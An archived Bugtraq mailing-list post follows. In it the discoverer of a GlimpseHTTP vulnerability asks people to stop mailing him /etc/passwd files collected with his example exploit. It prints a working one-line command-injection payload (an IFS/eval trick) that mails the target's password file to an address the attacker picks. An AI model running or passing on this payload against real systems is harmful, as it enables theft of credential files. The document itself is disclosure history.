Bugtraq: Vulnerability in GlimpseHTTP - more notes

[drazvan () KAPPA RO (Razvan Dragomirescu)]

Hi all,

I'm writing this because I received over 1M of mail containing /etc/passwd
files from all over the world. So PEOPLE, please STOP sending me your
password files. The exploit I provided was just an EXAMPLE. I'm glad you
liked it. At first it was fun to receive 2 or 3 /etc/passwd's per hour,
but now it's getting me quite confused and angry. So for all of you
out there, please REPLACE my e-mail address (drazvan () pop3 kappa ro) from
the exploit with your own address. It's much more useful... :)

So, you should use
|IFS=5;CMD=5mail5your_address\ () your_computer com\</etc/passwd;eval$CMD;echo

For God's sake, I hope 'your_address () your_computer com' is NOT a valid
e-mail address as is. :)

I assure you I have no intention to use the information I accidentaly
received in any way. I will delete it. I'm just keeping it for now for
statistics:).

I hope I have not offended anyone with this. If I did, I'm sorry.

Be good.
Razvan

--
Razvan Dragomirescu
drazvan () kappa ro, drazvan () romania ro, drazvan () roedu net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)